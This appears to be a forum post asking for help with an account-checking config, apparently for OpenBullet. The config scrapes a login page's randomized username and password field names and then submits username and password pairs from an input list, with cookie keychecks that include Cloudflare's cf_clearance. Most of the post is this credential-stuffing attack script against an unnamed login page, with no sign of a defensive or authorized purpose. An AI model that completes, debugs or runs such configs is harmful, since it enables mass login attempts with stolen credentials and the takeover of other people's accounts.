any help to parse cooking from form data like this (9fca59be9a296034c01f9e7bf8ebbf7e=1234567&9f228730883c38a1fd2f0e0013a9dc5e=1234567&maa=do_login )
i cannot get respnse
here is config i created
type or paste code here
```BLOCK:HttpRequest
LABEL:SITE
url = "http:// url /login.php"
customHeaders = ${("User-Agent", "<UA>"), ("Pragma", "no-cache"), ("Accept", "*/*"), ("Accept-Language", "en-US,en;q=0.8")}
TYPE:STANDARD
$""
""
ENDBLOCK
BLOCK:Keycheck
DISABLED
banIfNoMatch = False
KEYCHAIN BAN OR
STRINGKEY @data.SOURCE DoesNotContain ">Login in<"
STRINGKEY @data.COOKIES["PHPSESSID"] DoesNotExist ""
STRINGKEY @data.COOKIES["cf_clearance"] DoesNotExist ""
ENDBLOCK
BLOCK:Parse
LABEL:USERNAME
input = @data.SOURCE
leftDelim = "<input type=\"text\" name=\""
rightDelim = "\""
MODE:LR
=> VAR @USERNAME
ENDBLOCK
BLOCK:Parse
LABEL:PASSWORD
input = @data.SOURCE
leftDelim = "<input type=\"password\" name=\""
rightDelim = "\""
MODE:LR
=> VAR @PASSWORD
ENDBLOCK
BLOCK:HttpRequest
url = "http:// url /login.php"
method = POST
TYPE:STANDARD
$"<USERNAME>=<input.USER>&<PASSWORD>=<input.PASS>&maa=do_login"
"application/x-www-form-urlencoded"
ENDBLOCK